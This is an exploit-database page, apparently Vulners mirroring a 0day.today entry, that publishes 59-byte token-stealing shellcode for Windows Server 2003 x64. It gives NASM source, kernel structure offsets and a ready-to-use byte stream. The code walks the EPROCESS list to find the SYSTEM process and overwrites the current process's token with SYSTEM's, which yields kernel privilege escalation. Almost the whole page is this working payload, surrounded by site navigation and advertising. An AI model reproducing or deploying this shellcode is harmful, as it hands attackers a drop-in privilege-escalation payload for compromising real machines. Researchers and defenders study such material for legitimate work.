Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

win2003/x64 - Token Stealing shellcode - 59 bytes

🗓️ 20 Aug 2015 00:00:00Reported by Fitzl CsabaType 
zdt
 zdt🔗 0day.today👁 31 Views

win2003/x64 - Token Stealing shellcode - 59 bytes; Important structures and offsets for System and EPROCESS; Shellcode to steal SYSTEM token and overwrite current process token addres

Code
;token stealing shellcode Win 2003 x64
;based on the widely available x86 version
;syntax for NASM
;Author: Csaba Fitzl, @theevilbit
 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;important structures and offsets;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
 
;kd> dt -r1 nt!_TEB
;   +0x110 SystemReserved1  : [54] Ptr64 Void
;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
 
;kd> dt -r1 nt!_KTHREAD
;   +0x048 ApcState         : _KAPC_STATE
;     +0x000 ApcListHead      : [2] _LIST_ENTRY
;     +0x020 Process          : Ptr64 _KPROCESS
 
;kd> dt -r1 nt!_EPROCESS
;   +0x0d8 UniqueProcessId  : Ptr64 Void
;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
;     +0x000 Flink            : Ptr64 _LIST_ENTRY
;     +0x008 Blink            : Ptr64 _LIST_ENTRY
;  +0x160 Token            : _EX_FAST_REF
;     +0x000 Object           : Ptr64 Void
;     +0x000 RefCnt           : Pos 0, 4 Bits
;     +0x000 Value            : Uint8B
 
BITS 64
 
global start
 
section .text
 
start:
mov     rax, [gs:0x188]         ;Get current ETHREAD in
mov     rax, [rax+0x68]         ;Get current EPROCESS address
mov     rcx, rax                ;Copy current EPROCESS address to RCX
 
find_system_process:
mov     rax, [rax+0xe0]         ;Next EPROCESS ActiveProcessLinks.Flink
sub     rax, 0xe0               ;Go to the beginning of the EPROCESS structure
mov     r9 , [rax+0xd8]         ;Copy PID to R9
cmp     r9 , 0x4                ;Compare R9 to SYSTEM PID (=4)
jnz short find_system_process   ;If not SYSTEM got to next EPROCESS
 
stealing:
mov     rdx, [rax+0x160]        ;Copy SYSTEM process token address to RDX
mov     [rcx+0x160], rdx        ;Steal token with overwriting our current process's token address
retn    0x10
 
;byte stream:
;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Aug 2015 00:00Current
7.4High risk
Vulners AI Score7.4
win2003; x64; token stealing; shellcode; important structures; eprocess; system; overwrite; current process
31